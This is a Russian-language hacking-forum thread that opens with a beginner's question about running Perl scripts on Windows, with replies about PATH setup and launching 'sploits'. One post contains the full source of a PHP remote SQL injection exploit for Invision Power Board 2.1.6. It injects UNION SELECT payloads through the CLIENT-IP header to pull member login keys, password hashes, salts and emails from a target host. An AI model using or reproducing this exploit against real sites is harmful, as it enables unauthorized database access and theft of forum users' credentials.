Запуск Perl скрипта из командной строки

Discussion in 'Безопасность и Анонимность' started by Prince_Dark, 17 Nov 2005.

Thread Status:
Not open for further replies.
  1. Prince_Dark

    Prince_Dark New Member

    Joined:
    5 Nov 2005
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Помогите новечку. Почему у меня не запускается интерпритатор perl... Ну мне допустим надо запустить скрипт написанный на perl из командной строки я пишу например:

    C:\>perl test.pl

    Но мне сообщение

    ' perl ' is not recognized as an internal or external command, operable program or batch file

    Хотелось бы узнать с чем ето связано?... и что сделать надо? чтоб всё работало....
     
  2. RevenAnt

    RevenAnt Elder - Старейшина

    Joined:
    8 Apr 2005
    Messages:
    60
    Likes Received:
    18
    Reputations:
    9
    у тебя должен для начала быть установлен етот самый пёрл...
    под винду к примеру юзают ActivePerl .... (ссылки даст любой поисковик)
     
  3. Prince_Dark

    Prince_Dark New Member

    Joined:
    5 Nov 2005
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    О пасиб чувак большое.... теперь всё работает.
     
  4. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    А у меня не запкскается никогда таким вот
    макаром(пробовал однажды)
    Приходится честно писать
     
  5. nerezus

    nerezus Banned

    Joined:
    12 Aug 2004
    Messages:
    3,191
    Likes Received:
    729
    Reputations:
    266
    Мой компьютер => свойства => дополнительно => переменные среды => Path
     
    2 people like this.
  6. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    DRON а я ваще сразу sploit.pl запускаю и фсе=)
     
  7. Ruax

    Ruax New Member

    Joined:
    25 Nov 2005
    Messages:
    19
    Likes Received:
    3
    Reputations:
    0
    Я поместил в папку Exploits у ся на тачке bat-файл такого содержания:

    C:\WINDOWS\system32\cmd.exe

    Делаем ярлык на bat файл на рабочий стол.
    При открытии появляеца следущее:

    E:\Exploits>C:\WINDOWS\system32\cmd.exe
    Microsoft Windows XP [Версия 5.1.2600]
    (С) Корпорация Майкрософт, 1985-2001.

    E:\Exploits>

    Вводим my_0day_sploit.pl и все

    з.ы. тоже самое я проделал для nmap'a
     
    1 person likes this.
  8. ch[@]ch

    ch[@]ch Banned

    Joined:
    21 Jun 2007
    Messages:
    1
    Likes Received:
    16
    Reputations:
    -2
    сори за нупский вопрос....а как сохранить определеный скрипт в .pl и запустить его??и важен ли в какой директории она находится?
     
    1 person likes this.
  9. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Открываешь блокнот, всовываешь туда код на перле, жмакаешь сохранить как, даешь имя sploit.pl жмешь OK. Устанавливаешь Active Perl, копируешь свой сплоит в папку bin этого пакета, запускаешь cmd, идешь в папку bin и даешь команду perl sploit.pl
     
    2 people like this.
  10. ch[@]ch

    ch[@]ch Banned

    Joined:
    21 Jun 2007
    Messages:
    1
    Likes Received:
    16
    Reputations:
    -2
    спасибо большое.....я сохранил все полусилось но вот не запускается =(((я вот этот скрипт хочу
    PHP:
    <? 
    ## Invision Power Board <= 2.1.6 "CLIENT_IP" Remote SQL Injection Exploit 
    ## Coded by Cytech (hellknights.void.ru), Vulnerability by 1dt.w0lf (rst.void.ru) 

    Error_Reporting(E_ALL & ~E_NOTICE); 
    function 
    SendExploit($host,$port,$exploit,$mode

            
    $sock fsockopen($host,$port,$errno,$errstr); 
            if (!
    $sock) echo "\ncant connect to remote server!"
        else 
        { 
           
    fputs ($sock,$exploit); 
           while (!
    feof($sock)) 
           { 
            
    $y0=fgets($sock,9999); 
            if(
    $mode == "geterror"
            { 
                 echo(
    htmlspecialchars($y0)); 
            } 
            
    $j $j.$y0
           } 
        } 
            
    fclose ($sock); 

        if(
    $mode == "sqlinject"
        { 
            
    $killhdr=substr($j,strpos($j,"session_id=")); 
            
    $killhdz=substr($killhdr,0,strpos($killhdr,'path')  ); 
            
    $res str_replace("session_id=""\nanswer="$killhdz); 
            echo 
    htmlspecialchars($res); 
        } 


    echo<<<
    EOF 
    <pre><center><h2>Invision Power Board 2.1.6 "CLIENT_IP" SQL-injection Exploit</h2>[ Coded by CytechVulnerability by 1dt.w0lf ]</center
    <
    form action="" method="post"
    HOST:     <input name="host" size="20" value="hackme.ru">                 * hostname  
    PORT
    :     <input name="port" size="20" value="80">                 * httpd`s port 
    PATH:     <input name="path" size="21" value="/index.php">                * path to forum
    `s index.php 
    USERID
    :   <input name="uname" size="21" value="1">                * usernamewhich data you want to get 
    PREFIX
    :   <input name="prefix" size="21" value="ibf_">                * you can get prefix from error (click "geterror"
    ROW:      <SELECT name="shellcode"
    <
    OPTION value="ip_address">ip_address (members)</OPTION
    <
    OPTION value="member_login_key">member_login_key (members)</OPTION
    <
    OPTION value="id">id (members)</OPTION
    <
    OPTION value="name">name (members)</OPTION
    <
    OPTION value="email">email (members)</OPTION
    <
    OPTION value="legacy_password">GET legacy_password (members)</OPTION
    <
    OPTION value="converge_pass_hash">converge_pass_hash (members_converge)</OPTION
    <
    OPTION value="converge_pass_salt">converge_pass_salt (members_converge)</OPTION
    <
    OPTION value="converge_email">converge_email (members_converge)</OPTION
    </
    SELECT> * row which you want to get (table
    TABLE:<SELECT name="table">  
    <
    OPTION value="members">members</OPTION
    <
    OPTION value="members_converge">members_converge</OPTION
    </
    SELECT>                     * pleasechoose here table eq row which you selected before 
    <input name="exploit" value="exploit IPB" type="submit">     <input name="geterror" value="check vulnerability & get prefix" type="submit"

    [+] 
    shellcode example:  ' UNION SELECT ip_address,0,0,0 FROM ibf_members WHERE id=1/*  
    </form> 
    EOF; 
                $host         =     $_POST['
    host']; 
            $path         =     $_POST['
    path']; 
                   $port         =     $_POST['
    port']; 
            $shellcode      =     $_POST['
    shellcode']; 
            $dbprefix    =    $_POST['
    prefix']; 
            $table        =    $_POST['
    table']; 
            $uname        =    $_POST['
    uname']; 

        echo "\n------------------------------------------------------------------\n"; 

    if(!is_null($_POST['
    exploit'])) 

        if($_POST['
    table']=="members") $id = "id"; else $id = "converge_id"; 
        $injectcode = "' 
    UNION SELECT ".$shellcode.",0,0,0 FROM ".$dbprefix.$table." WHERE ".$id."='".$uname."'/*"; 
        echo "[+] current used shellcode: $injectcode"; 
        $exploit  = "GET ".$path."?s=technoid_attacker HTTP/1.1\r\n". 
                "TE: deflate,gzip;q=0.3\r\n". 
                "Connection: TE, close\r\n". 
                "Host: ".$host."\r\n". 
                "User-Agent:\r\n". 
                "CLIENT-IP: ".$injectcode."\r\n\r\n"; 

        SendExploit($host,$port,$exploit,"sqlinject"); 


    if(!is_null($_POST['geterror'])) 

        $injectcode = " 'technoid-attacker"; 
        echo "[+] current used shellcode: $injectcode"; 
        $exploit  = "GET ".$path."?s=technoid_attacker HTTP/1.1\r\n". 
                "TE: deflate,gzip;q=0.3\r\n". 
                "Connection: TE, close\r\n". 
                  "Host: ".$host."\r\n". 
                "User-Agent:\r\n". 
                "CLIENT-IP: ".$injectcode."\r\n\r\n"; 
        SendExploit($host,$port,$exploit,"geterror"); 


        echo "\n------------------------------------------------------------------\n"; 
        echo "</pre>"; 
    ?>
    а он говорит
    че делать??можешь аську дать пожалуйста?
     
  11. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,190
    Reputations:
    430
    У тебя PHP сплойт а не Perl.
    Закрыто.
     
Thread Status:
Not open for further replies.